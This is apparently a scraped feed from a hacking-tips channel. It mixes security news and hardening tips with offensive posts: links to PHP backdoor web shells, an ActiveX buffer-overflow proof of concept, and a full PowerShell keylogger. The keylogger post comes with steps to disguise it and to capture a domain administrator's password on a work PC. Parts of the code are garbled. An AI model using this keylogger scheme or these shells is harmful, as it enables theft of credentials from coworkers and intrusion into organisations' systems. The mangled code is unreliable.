Largest cryptocurrency seizure: $1,000,000,000 was seized from the wallet of the Silk Road.
#DataBreaches

New Critical unpatched Vulnerability in Micro Focus can leak the password login.
#Vulnerabilities

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑What is PaaS?

1) Platform-as-a-Service (PaaS) is a cloud computing model that provides a platform on which customers can develop, secure, run, and manage web applications.
It provides an optimized environment in which different teams can develop and deploy applications without buying or managing the underlying IT infrastructure and related services.

2) Typically, the platform provides the necessary resources and infrastructure to support the entire software development and deployment lifecycle, while providing developers and users with access from anywhere over the Internet.

3) The benefits of PaaS include, but are not limited to, simplicity, convenience, lower cost, flexibility, and scalability.

4) Typically PaaS protection differs from a traditional on-premises datacenter, as we'll see.

5) The PaaS environment is based on a shared security model.

6) The provider protects the infrastructure, and PaaS customers are responsible for protecting their accounts, applications, and data hosted on the platform.
Ideally, security moves from a local security model to an identity perimeter.

This means that the PaaS customer must place more emphasis on identity as the primary security perimeter.

Issues to look out for include security, testing, code, data and configuration, employees, users, authentication, operations, monitoring, and logs.

@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑PHP backdoors shells new:

[Simple Shell](https://github.com/backdoorhub/shell-backdoor-list/blob/master/shell/php/simple-shell.php)

B374K Shell

[C99 Shell](https://github.com/ismailtasdelen/shell-backdoor-list/blob/master/shell/php/c99.php)

R57 Shell

[Wso Shell](https://github.com/ismailtasdelen/shell-backdoor-list/blob/master/shell/php/wso.php)

0byt3m1n1 Shell

[Alfa Shell](https://github.com/ismailtasdelen/shell-backdoor-list/blob/master/shell/php/alfa.php)

AK-47 Shell

[Indoxploit Shell](https://github.com/ismailtasdelen/shell-backdoor-list/blob/master/shell/php/indoxploit.php)

Marion001 Shell

[Mini Shell](https://github.com/ismailtasdelen/shell-backdoor-list/blob/master/shell/php/mini.php)

p0wny-shell

[Sadrazam Shell](https://github.com/ismailtasdelen/shell-backdoor-list/blob/master/shell/php/sadrazam.php)

Webadmin Shell

[Wordpress Shell](https://github.com/ismailtasdelen/shell-backdoor-list/blob/master/shell/php/wordpress.php)

LazyShell

@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑How to create a hidden folder with password in Win system:

1) First create a folder and name it "hidden files";

2) Then open the folder, then right-click the mouse in the blank area of ​​the window and select the "New → Text Document" command to create a text file;

3) Copy the following code into the newly created text file:

@ECHO OFF
　　title Folder Private
　　if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
　　if NOT EXIST Private goto MDLOCKER
　　:CONFIRM
　　echo Are you sure you want to lock the folder(Y/N)
　　set/p "cho=>"
　　if %cho%==Y goto LOCK
　　if %cho%==y goto LOCK
　　if %cho%==n goto END
　　if %cho%==N goto END
　　echo Invalid choice.
　　goto CONFIRM
　　:LOCK
　　ren Private "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
　　attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
　　echo Folder locked
　　goto End
　　:UNLOCK
　　echo Enter password to unlock folder
　　set/p "pass=>"
　　if NOT %pass%== PASSWORD_GOES_HERE goto FAIL
　　attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
　　ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Private
　　echo Folder Unlocked successfully
　　goto End
　　:FAIL
　　echo Invalid password
　　goto end
　　:MDLOCKER
　　md Private
　　echo Private created successfully
　　goto End
　　:End
4) replace "PASSWORD_GOES_HERE" with the password you want, such as: 12345, the final effect is: if NOT %pass%== 12345 goto FAIL;

5) Then save the text file as .bat format, the file name can be set to "locker.bat", reminder, set the save type to "all files" to save successfully;

6) Double-click the "Locker.bat" file again to make the contents of the "Private" folder disappear. Enter "Y" in the command prompt window that appears and press Enter; at this time, we found that the folder is hidden

@UndercodeTesting
don't clone our tips:)
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BOF PoC for 2008-2012 versions:

var body='<OBJECT CLASSID="CLSID:C932BA85-4374-101B-A56C-00AA003668DC" width="10"><PARAM NAME="Mask" VALUE="'; var body1='"></OBJECT>'; var buf='';


var body='<OBJECT CLASSID="CLSID:C932BA85-4374-101B-A56C-00AA003668DC"
width="10"><PARAM NAME="Mask" VALUE="';

var body1='"></OBJECT>';

var buf='';
for (i=1;i<=1945;i ){buf=buf unescape(" ");}


document.write(body buf body1);

@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

💉 App security tips for mobile, web, and desktop apps :

1) Make sure your application has no vulnerabilities.
The most dangerous threat to an application is its own vulnerabilities and flaws.

Make sure there are no known vulnerabilities in your application.

It can be as a web application, mobile application, or desktop application, and the vulnerability remediation will help prevent threats.

2) Consider testing the security of your application before shipping it to production.
To eliminate the vulnerability, you can conduct security testing of your applications.

Security testing doesn't slow down the development process.

Security testing helps you find and fix vulnerabilities in your application, as well as make your applications more efficient.

Therefore, consider checking the security of your applications before going into production.

3) Bug Bounty program
Many large companies such as Mozilla, Facebook, Yahoo!, Google, Reddit, Square, and Microsoft are organizing Bug Bounty programs to identify vulnerabilities in their applications.

This program allows your organization to find and fix bugs before they become known to the public or known hackers.

This way you can prevent incidents.

4) Train your organization on application security best practices.
You can also protect your apps by educating your employees about their security.

Knowledge of cybersecurity can help your organization counter the threats of your applications.

5) Use an automatic scanner to keep the application secure.
Scanning your entire application is also a good security measure.

Consider using an automated scanner to scan that will run tests daily.

You can also use vulnerability scanning tools that are automated.

Vulnerability scanning tools will search your applications for vulnerabilities such as cross-site scripting, SQL injection, command injection, path traversal, etc.

6) Think Before Using Open Source In Your Application
open source can be vulnerable.

Thus, using open source code in your application can leave your applications vulnerable to cyber attacks.

So think twice before using open source in your application.

Riskemy.com says, "Just one line of broken code can destroy an entire site."

7) Consider encrypting your application source code.
Source code encryption ensures that an attacker cannot gain access to the source code of your applications.

8) Penetration testing also helps protect your applications
Penetration testing is also a pentest.

Penetration testing is useful for protecting cybercriminal applications.

Penetration testing is the practice of discovering vulnerabilities in a computer system, network, or web application that an attacker could exploit.

@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

New Samsung Vulnerability allows attackers to bypass authentication for a locked Gallery.
#Vulnerabilities

Many unpatched Vulnerabilities in android LG devices.
#Vulnerabilities

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑How to check for unnecessary subscriptions on iPhone?
#FastTips

1) These days, one-time purchases of games, music, books, news, movies, and TV shows on mobile are being replaced by monthly subscriptions. It is enough to subscribe once and the funds will be automatically debited every month. There are free trial periods, to gain access to which you also need to subscribe to the service. After that, you can forget to unsubscribe if you don't want to pay. Or some don't know how to unsubscribe. We will tell you how to avoid such troubles.

2) There are several ways to check for subscriptions on iPhone, whether paid or free. Subscriptions made with your Apple ID account are verified. Services like Apple Arcade, Apple News +, Apple Music, Apple TV +, Apple TV, and third-party services appear in one place.

3) You can access the subscription management page from applications such as Books, Music, iTunes Store. The fastest way to do this is in system settings, App Store and TV apps.

Settings: Apple ID -> Subscriptions

Profile icon (in Today, Games, Apps and Arcade) -> subscriptions on the app Store

4) Settings (left), App Store (center), TV (right)

Once on the subscription page, you will see all subscriptions associated with your Apple ID account, active and expired. To cancel, click under the active ones, then click "Cancel free trial" or "Cancel subscription", then in the window click "Confirm".

5) Keep in mind that these are only Apple ID-related subscriptions. You may have others with other accounts that do not appear on this page. If you suspect the existence of such subscriptions, check the corresponding applications. Examples include subscriptions to GrubHub, DoorDash, Netflix, Hulu.

@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

Tech giants face more investigations, Apple’s app store can’t stand alone.
#international

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑⚙️How to get an admin password on a work PC in an Active Directory domain?

A) First, find the location of the shortcut for the installed PowerShell ISE. Usually it is located at C: \ Users \ Username \ AppData \ Roaming \ Microsoft \ Windows \ Start Menu \ Programs \ Windows PowerShell, find the Windows PowerShell ISE file and in the properties, on the shortcut tab change its shortcut to something inconspicuous, for example an icon of a folder or an icon of software allowed in the organization in * .ico format, for example 1C.

B) I will indicate the shortcut of the IE browser, since everyone has it and is often not prohibited from use by security policies, since most government sites work correctly on the client side only on it. Now, after launch, the IE icon will be displayed in the start menu bar, which will not arouse suspicion.


c) Then open Windows PowerShell ISE and copy the keylogger script code:

#requires -Version 2

function Start-KeyLogger ($ Path = "$ env: temp \ keylogger.txt")

{

# Signatures for API Calls

$ signatures = @ '

[DllImport ("user32.dll", CharSet = CharSet.Auto, ExactSpelling = true)]

public static extern short GetAsyncKeyState (int virtualKeyCode);

[DllImport ("user32.dll", CharSet = CharSet.Auto)]

public static extern int GetKeyboardState (byte [] keystate);

[DllImport ("user32.dll", CharSet = CharSet.Auto)]

public static extern int MapVirtualKey (uint uCode, int uMapType);

[DllImport ("user32.dll", CharSet = CharSet.Auto)]

public static extern int ToUnicode (uint wVirtKey, uint wScanCode, byte [] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);

'@

# load signatures and make members available

$ API = Add-Type -MemberDefinition $ signatures -Name 'Win32' -Namespace API -PassThru


# create output file

$ null = New-Item -Path $ Path -ItemType File -Force

try

{

Write-Host 'Recording key presses. Press CTRL + C to see results. ' -ForegroundColor Red




# create endless loop. When user presses CTRL + C, finally-block

# executes and shows the collected key presses

while ($ true) {

Start-Sleep -Milliseconds 40



# scan all ASCII codes above 8

for ($ ascii = 9; $ ascii -le 254; $ ascii ++) {

# get current key state

$ state = $ API :: GetAsyncKeyState ($ ascii)




# is key pressed?

if ($ state -eq -32767) {

$ null = [console] :: CapsLock




# translate scan code to real code

$ virtualKey = $ API :: MapVirtualKey ($ ascii, 3)




# get keyboard state for virtual keys

$ kbstate = New-Object Byte [] 256

$ checkkbstate = $ API :: GetKeyboardState ($ kbstate)




# prepare a StringBuilder to receive input key

$ mychar = New-Object -TypeName System.Text.StringBuilder




# translate virtual key

$ success = $ API :: ToUnicode ($ ascii, $ virtualKey, $ kbstate, $ mychar, $ mychar.Capacity, 0)




if ($ success)

{

# add key to logger file

[System.IO.File] :: AppendAllText ($ Path, $ mychar, [System.Text.Encoding] :: Unicode)

}

}

}

}

}

finally

{

# open logger file in Notepad

notepad $ Path

}

}




# records all key presses until script is aborted by pressing CTRL + C

# will then open the file with collected key codes

🦑Start-KeyLogger

Now we create an application for installing software or ask the admin to install some legitimate program for us. Before the administrator connects to you remotely or comes in person for the specified work, we launch our script with the Run script command

@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑the content that sniffer cares about can be divided into the following categories:

1) Password
I think this is the reason for the vast majority of illegal use of sniffer, sniffer can record the userid and passwd transmitted in plain text. Even if you use encryption during network transmission Data, like the data recorded by sniffer, may cause the intruder to work out your algorithm while eating skewers at home.

2) Financial account
Many users are at ease using their credit card or cash account on the Internet, but sniffers can easily intercept the user name, password, credit card number, expiration date, account number, and pin sent on the Internet.

3) keeping confidential or sensitive information and data
through interception Data packets, intruders can easily record the transfer of sensitive information between others, or simply intercept the entire email conversation process.

4) Spy on low-level protocol information.
This is a terrible thing, I think, by recording the underlying information protocol, such as recording the network interface address between two hosts, the remote network interface ip address, ip routing information, and the byte order number of the tcp connection. This information will pose a great harm to network security after being held by an illegal intruder. Usually someone uses sniffers to collect this information for only one reason: he is conducting a fraud, (usually ip address fraud requires you to accurately insert the tcp connection Byte order number, which will be pointed out in a later article) If someone is very concerned about this issue, then the sniffer is just a prelude to him, and the problem will be much bigger in the future. (For advanced hackers, I think this is the only reason to use sniffers)

@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

Real Methode :
InfoZip UnZip 6.00 / 6.1c22 Buer Overow

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑🐧 CentOS Server Security Tips :

A) Disable unnecessary commands SUID and SGID
If the setuid and setgid bits are set in binaries, these commands can run tasks with other user or group privileges, such as root privilege, which can lead to serious security problems.

B) Often, buffer overflow attacks can exploit these executables to run unauthorized code as root.

# find / -path / proc -prune -o -type f \ (-perm -4000 -o -perm -2000 \) -exec ls -l {} \;
To clear the setuid bit, run the following command:

# chmod us / path / to / binary_file
To clear the setgid bit, run the following command:

# chmod gs / path / to / binary_file
22. Check for unknown files and directories
Files or directories not owned by an existing account must be removed or user and group rights assigned.

C) Run the below find command to list files or directories without users and groups.

# find / -nouser -o -nogroup -exec ls -l {} \;

D) List of files available for recording
Keeping a writable file on the system can be dangerous because anyone can change it.

Run the command below to display writable files other than symbolic links, which are always writable to everyone.

# find / -path / proc -prune -o -perm -2! -type l –ls

Create strong passwords
Create a password that is at least eight characters long.

Password must contain numbers, special characters and capital letters.

Use pwmake to generate a 128-bit password from / dev / urandom.

# pwmake 128

E) Implement a strong password policy
Force the system to use strong passwords by adding the following line to the /etc/pam.d/passwd file:

password required pam_pwquality.so retry = 3
By adding this line, you are entering a policy where the entered password cannot contain more than 3 characters in a monotone sequence, for example abcd, and more than 3 identical consecutive characters, for example 1111.

To force users to use a password of at least 8 characters, including all character classes, sequential character checking, add the following lines to /etc/security/pwquality.conf:

minlen = 8
minclass = 4
maxsequence = 3
maxrepeat = 3
How to Apply Strong User Password Policy in Ubuntu / Debian

F) Use password aging
The chage command can be used to control the age of a user's password.

To set the age of a user's password to 45 days, use the following command:

# chage -M 45 username
To disable password expiration use the command:

# chage -M -1 username
Force password expiration (user must change password at next login):
# chage -d 0 username

G) Blocking accounts
User accounts can be locked out by running passwd or usermod command:

# passwd -l username
# usermod -L username


@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

Alot of paid hacking book/ free on github!

https://github.com/yeahhub/Hacking-Security-Ebooks

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑OTP BYPASS :
Vulnerable OTP Application created using PHP & Google OTP/Updated!

You will need
1. Web Server (Apache recommended)
2. PHP 7 and above
3. Mysql or MariaDB

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1) get https://github.com/mddanish/Vulnerable-OTP-Application

2) A step by step series of examples that tell you have to get the application running

After installing Apache, PHP 7 and MariaDB, which I think that you know how to install, or else google about it.

3) Setting up Application database.

Run SQL File vuln_otp.sql against MariaDB to create necessary Database, Table and Columns

4) Adding Database details to application

Edit config > db_connection.php and details of Database connections details (Hostname, Username, Password, Database Name)

5) Open the Application in browser and have fun.

Running the tests
You can use Burp suite or Browser web developer mode to bypass OTP login. Remember to Register a test user before Bypassing it, and use Google Authenticator for OTP


@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁